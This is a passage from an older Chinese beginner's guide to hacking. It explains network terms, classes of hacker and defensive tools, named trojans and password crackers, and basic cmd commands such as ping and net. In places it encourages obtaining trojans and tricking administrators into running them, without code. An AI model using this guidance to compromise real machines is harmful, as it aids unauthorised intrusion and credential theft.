所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知 识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建 议学习者初步了解有关 tcp/ip 协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏 览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部 28 分内容将会在后面的章节中进行具体介绍。 四、熟悉几种流行的编程语言和脚本: 同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执 行结果就可以了。建议学习者初步学习 C 语言、asp 和 cgi 脚本语言,另外对于 htm 超文本 语言和 php、java 等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语 言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习 C 语言和 htm 超文本语言。 五、熟悉网络应用程序: 网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache 等服务器后台;还有网 上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后安装并 运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依*理论学 习要容易许多,能够达到事半功倍的效果! ================================================== 网络安全术语解释 一、协议: 网络是一个信息交换的场所,所有接入网络的计算机都可以通过彼此之间的物理连设备行信 息交换,这种物理设备包括最常见的电缆、光缆、无线 WAP 和微波等,但是单纯拥有这些 物理设备并不能实现信息的交换,这就好像人类的身体不能缺少大脑的支配一样,信息交换 还要具备软件环境,这种“软件环境”是人类实现规定好的一些规则,被称作“协议”,有 了协议,不同的电脑可以遵照相同的协议使用物理设备,并且不会造成相互之间的“不理解”。 这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如 没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样, 它们通过各种预先规定的协议完成不同的使命,例如 RFC1459 协议可以实现 IRC 服务器与 客户端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运 作机理的目的。 每一个协议都是经过多年修改延续使用至今的,新产生的协议也大多是在基层协议基础上建 立的,因而协议相对来说具有较高的安全机制,黑客很难发现协议中存在的安全问题直接入 手进行网络攻击。但是对于某些新型协议,因为出现时间短、考虑欠周到,也可能会因安全 问题而被黑客利用。 对于网络协议的讨论,更多人则认为:现今使用的基层协议在设计之初就存在安全隐患,因 而无论网络进行什么样的改动,只要现今这种网络体系不进行根本变革,从根本上就无法杜 绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围,因而不在这里详细介绍。 29 二、服务器与客户端: 最简单的网络服务形式是:若干台电脑做为客户端,使用一台电脑当作服务器,每一个客户 端都具有向服务器提出请求的能力,而后由服务器应答并完成请求的动作,最后服务器会将 执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站 服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式,它不需要服务器的支持, 而是直接将两个客户端电脑进行连接,也就是说每一台电脑都既是服务器、又是客户端,它 们之间具有相同的功能,对等的完成连接和信息交换工作。例如 DCC 传输协议即属于此种 类型。 从此看出,客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的 上网用户,都是操作着自己的电脑(客户端),别且向网络服务器发出常规请求完成诸如浏 览网页、收发电子邮件等动作的,而对于黑客来说则是通过自己的电脑(客户端)对其他电 脑(有可能是客户端,也有可能是服务器)进行攻击,以达到入侵、破坏、窃取信息的目的。 三、系统与系统环境: 电脑要运作必须安装操作系统,如今流行的操作系统主要由 UNIX、Linux、Mac、BSD、 Windows2000、Windows95/98/Me、Windows NT 等,这些操作系统各自独立运行,它们有 自己的文件管理、内存管理、进程管理等机制,在网络上,这些不同的操作系统既可以作为 服务器、也可以作为客户端被使用者操作,它们之间通过“协议”来完成信息的交换工作。 不同的操作系统配合不同的应用程序就构成了系统环境,例如 Linux 系统配合 Apache 软件 可以将电脑构设成一台网站服务器,其他使用客户端的电脑可以使用浏览器来获得网站服务 器上供浏览者阅读的文本信息;再如 Windows2000 配合 Ftpd 软件可以将电脑构设成一台文 件服务器,通过远程 ftp 登陆可以获得系统上的各种文件资源等。 四、IP 地址和端口: 我们上网,可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目, 都是通过不同的协议完成的,然而网络如此之大,我们的电脑怎么能够找到服务项目所需要 的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到 IP 地址了。 每一台上网的电脑都具有独一无二的 IP 地址,这个地址类似于生活中人们的家庭地址,通 过网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个 电脑之间的信息交换工作,因为他们的 IP 地址不同,所以不会出现找不到目标的混乱局面。 但是黑客可以通过特殊的方法伪造自己电脑的 IP 地址,这样当服务器接受到黑客电脑(伪 IP 地址)的请求后,服务器会将应答信息传送到伪 IP 地址上,从而造成网络的混乱。当然, 黑客也可以根据 IP 地址轻易的找到任何上网者或服务器,进而对他们进行攻击(想想现实 中的入室抢劫),因而如今我们会看到很多关于《如何隐藏自己 IP 地址》的文章。 接下来我解释一下上面提到的第二个问题:一台电脑上为什么能同时使用多种网络服务。这 好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会 在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服 务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户 端请求。 30 网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服 务,这个服务可以用来专门完成黑客的目的,那么服务器上就会被打开一个新的端口来完成 这种服务,因为这个端口是供黑客使用的,因而轻易不会被一般上网用户和网络管理员发现, 即“隐藏的端口”,故“后门”。 每一台电脑都可以打开 65535 个端口,因而理论上我们可以开发出至少 65535 种不同的网络 服务,然而实际上这个数字非常大,网络经常用到的服务协议不过几十个,例如浏览网页客 户端和服务端都使用的是 80 号端口,进行 IRC 聊天则在服务端使用 6667 端口、客户端使 用 1026 端口等。 五、漏洞: 漏洞就是程序中没有考虑到的情况,例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽 某些网络应用程序中的账号;Perl 程序漏洞则可能是由于程序员在设计程序的时候考虑情况 不完善出现的“让程序执行起来不知所措”的代码段,“溢出”漏洞则属于当初设计系统或 者程序的时候,没有预先保留出足够的资源,而在日后使用程序是造成的资源不足;特殊 IP 包炸弹实际上是程序在分析某些特殊数据的时候出现错误等…… 总而言之,漏洞就是程序设计上的人为疏忽,这在任何程序中都无法绝对避免,黑客也正是 利用种种漏洞对网络进行攻击的,本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。 黑客利用漏洞完成各种攻击是最终的结果,其实真正对黑客的定义就是“寻找漏洞的人”, 他们并不是以网络攻击为乐趣,而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应 该说,从某种程度上讲,黑客都是“好人”,他们为了追求完善、建立安全的互联网才投身 此行的,只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞,近些年人们才 对黑客有了畏惧和敌视的心理。 六、加密与解密: 在“协议”的讲解中,我提到了“由于网络设计的基层存在问题……”,简单的说这一问题 是允许所有上网者参与信息共享,因而对某些商业、个人隐私在网络上的传送,就会暴露在 众目睽睽之下,我们的信用卡、个人电子邮件等都可以通过监听或者截获的方式被他人的到, 如何才能让这些信息安全呢?读者也许想到了“二战中”的间谍战:参战国家在使用电报的 时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行译码工作。 正是这种古老的加密方式,在现代化的网络上也依然存在它旺盛的生命力,通过加密处理的 信息在网络上传送,无论谁拿到了这份文件,只要没有“密码薄”仍然是白费力气的。 网络上最长使用的是设置个人密码、使用 DES 加密锁,这两种加密方式分别可以完成用户 登陆系统、网站、电子邮件信箱和保护信息包的工作,而黑客所要进行的工作,就是通过漏 洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文,有人把“魔高一尺、道高一 仗”用在这里,的确是在恰当不过了!网络上的加密方法和需要验证密码的系统层出不穷, 黑客也在寻找破解这些系统的种种办法。 可以说,“漏洞”和“解密”是两个完全不同的黑客领域,对于不同的学习者对他们的偏好, 将会直接影响到今后将会成为的黑客类型,因而在二者之间的选择,应根据个人喜好进行, 31 本书将会侧重学习“漏洞”方面的知识。 七、特洛伊木马: 特洛伊木马是一个程序,这个程序可以做程序设计者有意设计的未出现过的事情。但是对于 特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根据某些人的认识,病毒是 特洛伊木马的一个特例,即:能够传播到其他的程序当中(也就是将这些程序也变成特洛伊 木马)。根据另外的人的理解,不是有意造成任何损坏的病毒不是特洛伊木马。最终,不论 如何定义,许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序,以便将特洛伊 木马与病毒区分开。 ================================================== 四.常用黑客软件性质分类 一、扫描类软件: 扫描是黑客的眼睛,通过扫描程序,黑客可以找到攻击目标的 IP 地址、开放的端口号、服 务器运行的版本、程序中可能存在的漏洞等。因而根据不同的扫描目的,扫描类软件又分为 地址扫描器、端口扫描器、漏洞扫描器三个类别。在很多人看来,这些扫描器获得的信息大 多数都是没有用处的,然而在黑客看来,扫描器好比黑客的眼睛,它可以让黑客清楚的了解 目标,有经验的黑客则可以将目标“摸得一清二楚”,这对于攻击来说是至关重要的。同时 扫描器也是网络管理员的得力助手,网络管理员可以通过它既是了解自己系统的运行状态和 可能存在的漏洞,在黑客“下手”之前将系统中的隐患清除,保证服务器的安全稳定。 现在网络上很多扫描器在功能上都设计的非常强大,并且综合了各种扫描需要,将各种功能 集成于一身。这对于初学网络安全的学习者来说无疑是个福音,因为只要学习者手中具备一 款优秀的扫描器,就可以将信息收集工作轻松完成,免去了很多繁琐的工作。但是对于一个 高级黑客来说,这些现成的工具是远远不能胜任的,他们使用的程序大多自己编写开发,这 样在功能上将会完全符合个人意图,而且可以针对新漏洞既是对扫描器进行修改,在第一时 间获得最宝贵的目标资料。本书此部分将会介绍扫描器的具体使用方法,而在第二部分中则 会具体讲述如何开发这些扫描器,请读者务必循序渐进,否则将会给自己的学习带来很多不 必要的烦恼。 二、远程监控类软件: 远程监控也叫做“木马”,这种程序实际上是在服务器上运行一个客户端软件,而在黑客的 电脑中运行一个服务端软件,如此一来,服务器将会变成黑客的服务器的“手下”,也就是 说黑客将会利用木马程序在服务器上开一个端口,通过这种特殊的木马功能对服务器进行监 视、控制。因此,只要学习者掌握了某个木马的使用和操作方法,就可以轻易接管网络服务 器或者其他上网者的电脑。 在控制了服务器之后,黑客的攻击行动也就接近尾声了,然而在做这件事情之前,黑客必须 32 想办法让服务器运行自己木马的那个“客户端程序”,这就需要利用漏洞或者进行欺骗。欺 骗最简单,就是想办法让操作服务器的人(系统管理员之类)运行黑客的客户端程序,而利 用漏洞则要初学者阅读完本书后面的内容才能够做到了。 三、病毒和蠕虫: 首先声明一下:编写病毒的做法并不属于黑客。病毒只不过是一种可以隐藏、复制、传播自 己的程序,这种程序通常具有破坏作用,虽然病毒可以对互联网造成威胁,然而它并没有试 图寻找程序中的漏洞,所以制作病毒还有病毒本身对黑客的学习都没有实际意义。 之所以提到病毒,是因为蠕虫和病毒有很多相似性,如虫也是一段程序,和病毒一样具有隐 藏、复制、船舶自己的功能。不同的是蠕虫程序通常会寻找特定的系统,利用其中的漏洞完 成传播自己和破坏系统的作用,另外蠕虫程序可以将收到攻击的系统中的资料传送到黑客手 中,这要看蠕虫设计者的意图,因而蠕虫是介于木马和病毒之间的一类程序。 计算机蠕虫是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到 其他的计算机系统中(通常是经过网络连接)。蠕虫的制造需要精深的网络知识,还要具备高 超的编程水平,对于一个初学黑客的学习者来说,蠕虫的制造和使用都是非常难理解的,并 且大多数蠕虫攻击的对象是 Linux 系统,而本书所使用的学习平台是 Windows 95/98 或 Windows NT/2000,因而我同样建议初学者不要过多的涉及这部分内容,有关此部分内容也 将会在《攻学兼防》的第二部分中有所介绍。 四、系统攻击和密码破解: 这类软件大多数都是由高级黑客编写出来的,供初级黑客使用的现成软件,软件本身不需要 使用者具备太多的知识,使用者只要按照软件的说明操作就可以达到软件的预期目的,因而 这类软件不具备学习黑客知识的功效。不过这类软件对于黑客很重要,因为它可以大幅度减 小黑客的某些繁琐工作,使用者经过对软件的设置就可以让软件自动完成重复的工作,或者 由软件完成大量的猜测工作,充分利用剩余时间继续学习网络知识。 系统攻击类软件主要分为信息炸弹和破坏炸弹。网络上常见的垃圾电子邮件就是这种软件的 “杰作”,还有聊天室中经常看到的“踢人”、“骂人”类软件、论坛的垃圾灌水器、系统蓝 屏炸弹也都属于此类软件的变异形式。如果学习者能够认真学习黑客知识,最终可以自己编 写类似的工具,但如果某个人天天局限于应用此类软件上,他将永远是一个“伪黑客”。 密码破解类软件和上面的软件一样,完全依*它将对学习黑客毫无帮助。对于真正的黑客来 说,这种软件可以帮助寻找系统登陆密码,相对于利用漏洞,暴力破解密码要简单许多,但 是效率会非常低,但是真正的黑客无论是使用密码破解软件还是利用漏洞进入系统之后,都 达到了自己入侵的目的,因此对于如何进入系统,对于某些溺爱系统攻击的黑客来说无关紧 要。值得一提的是:真正执著于漏洞分析的黑客是从来不使用这种软件的,而我向来将分析 漏洞作为至高无上的工作,所以也尽量不去接触此类软件。 五、监听类软件: 通过监听,黑客可以截获网络的信息包,之后对加密的信息包进行破解,进而分析包内的数 33 据,获得有关系统的信息;也可能截获个人上网的信息包,分析的到上网账号、系统账号、 电子邮件账号等个人隐私资料。监听类软件最大的特点在于它是一个亦正亦邪的,因为网络 数据大多经过加密,所以用它来获得密码比较艰难,因而在更多的情况下,这类软件是提供 给程序开发者或者网络管理员的,他们利用这类软件进行程序的调试或服务器的管理工作。 ================================================== 五.常用黑客软件用途分类 一、防范: 这是从安全的角度出发涉及的一类软件,例如防火墙、查病毒软件、系统进程监视器、端口 管理程序等都属于此类软件。这类软件可以在最大程度上保证电脑使用者的安全和个人隐 私,不被黑客破坏。网络服务器对于此类软件的需要也是十分重视的,如日志分析软件、系 统入侵软件等可以帮助管理员维护服务器并对入侵系统的黑客进行追踪。 二、信息搜集: 信息搜集软件种类比较多,包括端口扫描、漏洞扫描、弱口令扫描等扫描类软件;还有监听、 截获信息包等间谍类软件,其大多数属于亦正亦邪的软件,也就是说无论正派黑客、邪派黑 客、系统管理员还是一般的电脑使用者,都可以使用者类软件完成各自不同的目的。在大多 数情况下,黑客使用者类软件的频率更高,因为他们需要依*此类软件对服务器进行全方位 的扫描,获得尽可能多的关于服务器的信息,在对服务器有了充分的了解之后,才能进行黑 客动作。 三、木马与蠕虫: 这是两种类型的软件,不过他们的工作原理大致相同,都具有病毒的隐藏性和破坏性,另外 此类软件还可以由拥有控制权的人进行操作,或由事先精心设计的程序完成一定的工作。当 然这类软件也可以被系统管理员利用,当作远程管理服务器的工具。 四、洪水: 所谓“洪水”即信息垃圾炸弹,通过大量的垃圾请求可以导致目标服务器负载超负荷而崩溃, 近年来网络上又开始流行 DOS 分散式攻击,简单地说也可以将其归入此类软件中。洪水软 件还可以用作邮件炸弹或者聊天式炸弹,这些都是经过简化并由网络安全爱好者程序化的 “傻瓜式”软件,也就是本书一开始指责的“伪黑客”手中经常使用的软件。 五、密码破解: 网络安全得以保证的最实用方法是依*各种加密算法的密码系统,黑客也许可以很容易获得 一份暗文密码文件,但是如果没有加密算法,它仍然无法获得真正的密码,因此使用密码破 34 解类软件势在必行,利用电脑的高速计算能力,此类软件可以用密码字典或者穷举等方式还 原经过加密的暗文。 六、欺骗: 如果希望获得上面提到的明文密码,黑客需要对暗文进行加密算法还原,但如果是一个复杂 的密码,破解起来就不是那么简单了。但如果让知道密码的人直接告诉黑客密码的原型,是 不是更加方便?欺骗类软件就是为了完成这个目的而设计的。 七、伪装: 网络上进行的各种操作都会被 ISP、服务器记录下来,如果没有经过很好的伪装就进行黑客 动作,很容易就会被反跟踪技术追查到黑客的所在,所以伪装自己的 IP 地址、身份是黑客 非常重要的一节必修课,但是伪装技术需要高深的网络知识,一开始没有坚实的基础就要用 到这一类软件了。 ================================================== 学习黑客的基本环境 一、操作系统的选择: 我们经常听说黑客酷爱 Linux 系统,这是因为 Linux 相对 Windows 提供了更加灵活的操作 方式,更加强大的功能。例如对于 IP 地址的伪造工作,利用 Linux 系统编写特殊的 IP 头信 息可以轻松完成,然而在 Windows 系统下却几乎不可能做到。但是 Linux 也有它不足的一 面,这个系统的命令庞杂、操作复杂,并不适合初学者使用,而且对于个人学习者,并没有 过多的人会放弃“舒适”的 Windows、放弃精彩的电脑游戏和便捷的操作方式,去全心投入 黑客学习中。而且对于初学黑客的学习者来说,大多数网络知识都可以在 Windows 系统中 学习,相对 Linux 系统,Windows 平台下的黑客软件也并不在少数,另外通过安装程序包, Windows 系统中也可以调试一定量的程序,因此初步学习黑客没有必要从 Linux 入手。 本书使用的平台 WindowsME,因为对于个人用户来说,NT 或者 2000 多少有些苛刻——系 统配置要求太高;然而使用 95 或者 98 又缺少某些必要的功能——NET、TELNET 命令不完 善。但是本书的大部分内容测试漏洞,从远程服务器出发,所以也不是非要 WindowsME 操 作系统进行学习,对于少数系统版本之间的差异,学习者可以和我联系获得相应系统的学习 方法。 二、需要的常用软件: 35 除了基本的操作系统以外,学习者还需要安装各类扫描器,之后下载一个比较优秀的木马软 件、一个监听类软件,除此以外别无它求。如果有必要,读者可以自行安装本文上述软件, 然后学习其用法,但是我要告诉你,对于各类炸弹、还有网络上各式各样的黑客软件,在学 习完本书后,你都可以自己制作、自己开发,根本没有必要使用他人编写的软件。 对于扫描器和监听软件,我给出以下建议,并且在本书的后面还会对这几个软件进行详细介 绍: 扫描器: 监听软件: 木马: 三、额外的工具: 如果可以安装下面的工具,将会对学习黑客有莫大的帮助,当然下面的软件主要是学习额外 内容并为“第二部分”学习作铺垫用的,所以没有也不会妨碍本书的学习。 1、后台服务器: 拥有某些网络应用的后台服务程序,可以将自己的电脑设置成一个小型服务器,用来学习相 应的网络应用,从“内部”了解其运作机理,这将会大大提高自己对服务器的感性认识,同 时还能够在激活服务器的时候;监测自己服务器上的数据,如果有其他黑客来攻击,则可以 清晰的记录下对方的攻击过程,从而学习到更多的黑客攻击方法。对于本书而言,主要介绍 网站的 Perl 和 asp 等脚本语言漏洞,所以可以安装一个 IIS 或者 HTTPD。然后在安装 ActivePerl,使自己的服务器具备编译 cgi 和 pl 脚本的能力。使用自己的服务器还有一个好 处,可以节省大量的上网时间,将学习、寻找漏洞的过程放到自己的电脑上,既节省了金钱、 有不会对网络构成威胁,一举两得。 2、C 语言编译平台: 今后在学习黑客的路途中,将会遇到很多“属于自己的问题”,这些问题网络上的其他人可 能不会注意,所以无法找到相应的程序,这个时候学习者就要自己动手开发有关的工具了, 所以安装一个 Borland C++将会非常便捷,通过这个编译器,学习者既可以学习 C 语言,也 能够修改本书后面列出的一些小程序,打造一个属于自己的工具库。 四、网络安全软件分类 现在我们来了解一下有关网络安全软件的分类,因为学习黑客知识是两个相互联系的过程: 既学习如何黑,还要学会如何防止被黑。 1、防火墙: 36 这是网络上最常见的安全机制软件,防火墙有硬件的、也有软件的,大多数读者看到的可能 更多都是软件防火墙。其功能主要是过滤垃圾信息(保证系统不会受到炸弹攻击)、防止蠕 虫入侵、防止黑客入侵、增加系统隐私性(对敏感数据进行保护)、实时监控系统资源,防 止系统崩溃、定期维护数据库,备份主要信息……防火墙可以将系统本身的漏洞修补上,让 黑客没有下手的机会。另外对于拥有局域网的企业来说,防火墙可以限制系统端口的开放, 禁止某些网络服务(杜绝木马)。 2、检测软件: 互联网上有专门针对某个黑客程序进行清除的工具,但是这类软件更多是集成在杀毒软件或 者防火墙软件内的,对于系统内的木马、蠕虫可以进行检测并清除,软件为了保护系统不受 侵害,会自动保护硬盘数据、自动维护注册表文件、检测内容可以代码、监测系统端口开放 状态等。如果用户需要,软件还可以编写有关的脚本对指定端口进行屏蔽(防火墙一样具备 此功能)。 3、备份工具: 专门用来备份数据的工具可以帮助服务器定期备份数据,并在制定时间更新数据,这样即便 黑客破坏了服务器上的数据库,软件也可以在短时间内完全修复收到入侵的数据。另外对于 个人用户,这类软件可以对硬盘进行完全映像备份,一旦系统崩溃,用户利用这类软件可以 将系统恢复到原始状态,例如 Ghost 就是这类软件中的佼佼者。 4、日志纪录、分析工具: 对于服务器来说,日志文件是必不可少的,管理员可以通过日志了解服务器的请求类型和请 求来源,并且根据日志判断系统是否受到黑客攻击。通过日志分析软件,管理员可以轻松的 对入侵黑客进行反追踪,找到黑客的攻击来源,进而抓不黑客。这也就是为什么黑客在攻击 的时候多采用 IP 地址伪装、服务器跳转,并在入侵服务器之后清除日志文件的原因。 ================================================== 网络流行黑客软件简介 (因主要教大家防御而不是攻击,因此暂时不提供相关的软件下载,需要研究的朋友可以去 网络搜索。稍后将有软件的详细使用说明) 一、国产经典软件简介(先介绍写老软件,但其在国产黑客业内有举足轻重的作用。) 溯雪 密码探测器:利用溯雪可以轻松的完成基于 web 形式的各种密码猜测工作,例如 email、forum 中的注册用户密码等。软件采取多线程编写,除了支持字典和穷举以外,软件最大的特色是 可以自己编写猜测规则,例如可以按照中文拼音或者英文单词拼写规则随机组合出字典文 件,最大程度上保证了猜测的准确性。 37 乱刀 密码破解:乱刀可以破解 unix 系统中的密码暗文,对于取得了 etc/passwd 文件的黑客来说 这是必不可少的。 天网 防火墙软件:中国第一套通过公安部认证的软硬件集成防火墙,能有效的防止黑客入侵,抵 御来自外部网络的攻击,保证内部系统的资料不被盗取,它根据系统管理者设定的安全规则 把守企业网络,提供强大的访问控制、身份认证、应用选通、网络地址转换、信息过滤、虚 拟专网、流量控制、虚拟网桥等功能。 冰河 木马类软件:国内响当当的木马软件,知名度绝不亚于 BO,主要用于远程监控。自动跟踪 屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、任意操作文件及注册表、远 程关机、发送信息等多种监控功能。此软件的一大特色是可以由使用者自己设置需要占用的 端口,如此一来监控类软件就很难从端口号上直接判断系统是否存在冰河了。 小分析家 监测类软件:免费网络协议分析工具,这个工具的特点是界面简单实用,与国外的一些 sniffer 产品相比,如 Netxray,结果更为直观。此软件为免费版本,只能运行在 NT 系统下,同时 编写此软件的公司还提供了软件的商业版本“网警”。 快速搜索 端口扫描器:快速搜索是一个在网络上搜索服务器的软件,可以根据给定的地址和端口号查 找机器。具有多线程同时搜索技术,可以将搜索速度提高到单线程的十倍以上。 其他:针对 2000/XP 扫描的 D-TOOLS 等。 二、常见网络安全软件简介 Local Port Scanner 本地端口扫描器:通过这个软件可以监测本地电脑被打开的端口。此软件可以监测大多数黑 客入侵或者木马占用的端口,它有五种不同的扫描方式并可以获得有关端口的详细扫描信 息。 A-spy 系统进程察看器:A-spy 可以监测 Windows 系统启动过程中调用的所有程序、执行的进程, 并将结果保存在日志文件中。这个软件的用途是检察系统是否被安置了木马程序,同时软件 还可以对系统启动需要调用的程序进行增加、删除和编辑等操作,改变调用程序之间的先后 38 顺序,软件支持包括 NT、2000 在内的所有 Windows 平台,具有 17 种方式清楚木马程序。 Netmon 图形化 Netstat 命令:Netmon 是图形化的 Netstat 命令,它运行在 Windows 系统中,可以察 看系统的 TCP、UDP 连接状态,同时此软件提供了一份完整的木马、蠕虫占用端口清单, 可以快速了解系统是否存在安全问题。 LANguard Network Scanner 局域网资料收集器:LANguard 允许使用者扫描局域网内部的搜索电脑,搜集他们的 netbios 信息、打开端口、共享情况和其他相关资料,这些资料及可以被黑客利用进行攻击,也可以 被管理员利用进行安全维护,通过它可以强行关闭指定端口和共享目录。 Leechsoft's NetMonitor TCP/IP 状态分析程序:这个软件使用于系统安全管理员、网络程序开发员、一般的拥护。 此工具可以显示电脑在上网状态下存在的 TCP/IP 连接,同时还能分析是否有其他人正在监 视上网者电脑中的某个端口,同时此工具内部还有一个功能强大的端口扫描程序。 Win Trinoo Server Sniper 清除 Win.Trinoo Server 程序:Win.Trinoo 是一个类似 DOS 攻击的木马程序,被植入它的电 脑将变成一台 Win.Trinoo Server,黑客通过这个 Server 能够“借刀杀人”攻击其他电脑系统。 Win Trinoo Server Sniper 可以高速的监测电脑是否存在此问题。 SubSeven Server Sniper 清除 SubSeven Server 程序:同上面的工具一样,SubSeven 也是一个木马程序,而 SubSeven Server Sniper 则是用来检测并清除 SubSeven 而设计的。不同的是,这个软件不但可以清楚 SubSeven,而且还能搜集攻击者在您电脑中留下的蛛丝马迹,找到攻击者的 ICQ 号码、email 地址等内容,从而为反跟踪提供了详尽的信息。 Attacker 端口监听程序:这是一个 TCP/UDP 端口监听程序,它可以常驻系统并在危险端口打开的时 候发出警告信息,保证个人上网隐私的安全性。 ICEWatch BlackICE 插件:这个插件可以完善 BlackICE 的结果列表,让列表更加详尽,同时该插件还 提供了更好的结果分类查询功能,并且可以对结果进行复制、编辑等操作。另外此插件为 BlackICE 提供了声音,可以设置软件使用过程中的提醒、警告的音效。 39 Isecure IP Scanner netbios 共享扫描器:黑客利用 netbios 的共享可以进入存在问题的电脑并对硬盘进行操作, 同时还可以获得入侵电脑上的隐私资料。这个扫描器就是专门为防止此类事件发生开发的, 运行软件会自动扫描目标并报告有关资料。 AnalogX Port Blocker 端口屏蔽程序:当使用者的电脑上开放某个端口的时候,任何人都可以通过其开放端口访问 相应资源,而 AnalogX Port Blocker 可以屏蔽某个端口,或者设置特殊 IP 地址禁止对指定端 口的请求,这从一定程度上方便了程序调试人员为在本地系统上从事软件的测试工作。 Tambu Dummy Server 端口屏蔽程序:这个工具同上面一个程序的功能是一样的,不过不同的是,这个工具是基于 控制台模式,更加适合于高手。 Tambu Registry Edit 注册表修改程序:该程序可以让使用者手动修改系统注册表中的各项键值,从而改变系统的 性能,同时软件中保存了网络上常见的具有破坏性程序的资料,可以迅速确定系统注册表中 是否有可疑程序,并提供了清除和备份等功能。 ================================================== 黑客必学的六条系统命令 这里我补充下,见笑了,呵呵,想学入侵,一定要知道 cmd 下的命令,如用 ipc$入侵等, 我发现有些人只知道黑客工具的使用,dos 命令却一个都不知,其实适当的熟悉一些命令也 无妨! 如:刚装完系统,打开了默认共享,现在用 dos 命令建立一个批处理删除默认共享。如下: 先打开 cmd 窗口,输入 copy con killshare.bat net share c$ /del net share d$ /del net share e$ /del net share admin$ /del net share ipc$ /del (如果删除了这个共享,则局域网无法互相访问,请注意!) 以下是原文:----------------------------------------------------------- 40 一、ping 命令 在 Windows 的控制窗口中(Windows 95/98/ME 的 command 解释器、Windows NT/2000 的 cmd 解释器),运行 ping 可以看到这个命令的说明,它是一个探测本地电脑和远程电脑之间 信息传送速度的命令,这个命令需要 TCP/IP 协议的支持,ping 将会计算一条信息从本地发 送到远程再返回所需要的时间,黑客使用这个命令决定是否对服务器进行攻击,因为连接速 度过慢会浪费时间、花费过多的上网费用。 另外这个命令还可以透过域名找到对方服务器的 IP 地址,我们知道域名只是提供给浏览网 页用的,当我们看到一个不错的域名地址后,要想通过 telnet 连接它,就必须知道对方的 IP 地址,这里也要使用 ping 命令的。 这个命令的基本使用格式可以通过直接运行ping获得,现在假设目标是http://www.abc.com/, 则可以在控制台下输入 ping www.abc.com,经过等待会得到如下信息: Pinging www.abc.com [204.202.136.32] with 32 bytes of data: Reply from 204.202.136.32: bytes=32 time=302ms TTL=240 Reply from 204.202.136.32: bytes=32 time=357ms TTL=240 Reply from 204.202.136.32: bytes=32 time=288ms TTL=240 Reply from 204.202.136.32: bytes=32 time=274ms TTL=240 Ping statistics for 204.202.136.32: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 274ms, Maximum = 357ms, Average = 305ms 注意它的返回值来判断对方 OS 这些信息的意思是:www.abc.com 的 IP 地址是 204.202.136.32,对他发送了四次数据包,数 据包的大小是 32 字节,每一次返回的时间分别是 302ms、357ms、288ms、274ms。综合看, 发送了四个数据包全部返回,最小时间是 274ms,最大时间 357ms,他们的平均时间是 305ms。 这样黑客就了解了连接对方服务器使用的时间。另外这个命令还有一些特殊的用法,例如可 以通过 IP 地址反查服务器的 NetBIOS 名,现在以 211.100.8.87 为例,使用 ping 配合“-a”, 在控制台下输入命令 ping -a 211.100.8.87,它的返回结果是: Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data: Reply from 211.100.8.87: bytes=32 time=96ms TTL=120 Reply from 211.100.8.87: bytes=32 time=110ms TTL=120 Reply from 211.100.8.87: bytes=32 time=110ms TTL=120 Reply from 211.100.8.87: bytes=32 time=109ms TTL=120 Ping statistics for 211.100.8.87: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 96ms, Maximum = 110ms, Average = 106ms 从这个结果会知道服务器的 NetBIOS 名称是 POPNET-FBZ9JDFV。另外在一般情况下还可 以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows 系列还是 UNIX/Linux 系列,一般情况下 Windows 系列的系统返回的 TTL 值在 100-130 之 间 ,而 UNIX/Linux 系列的系统返回的 TTL 值在 240-255 之间,例如上面的 www.abc.com 返 回的 TTL 是 240,对方的系统很可能是 Linux,而第二个目标的 TTL 是 120,那么说明它使 用的系统也许是 Windows。 另外 ping 还有很多灵活的应用,我不在这里过多的介绍,读者请另行查阅此命令相关帮助 41 文件。 二、net 命令: NET 命令是很多网络命令的集合,在 Windows ME/NT/2000 内,很多网络功能都是以 net 命令为开始的,通过 net help 可以看到这些命令的详细介绍: NET CONFIG 显示系统网络设置 NET DIAG 运行 MS 的 DIAGNOSTICS 程序显示网络的 DIAGNOSTIC 信息 NET HELP 显示帮助信息 NET INIT 不通过绑定来加载协议或网卡驱动 NET LOGOFF 断开连接的共享资源 NET LOGON 在 WORKGROUP 中登陆 NET PASSWORD 改变系统登陆密码 NET PRINT 显示或控制打印作业及打印队列 NET START 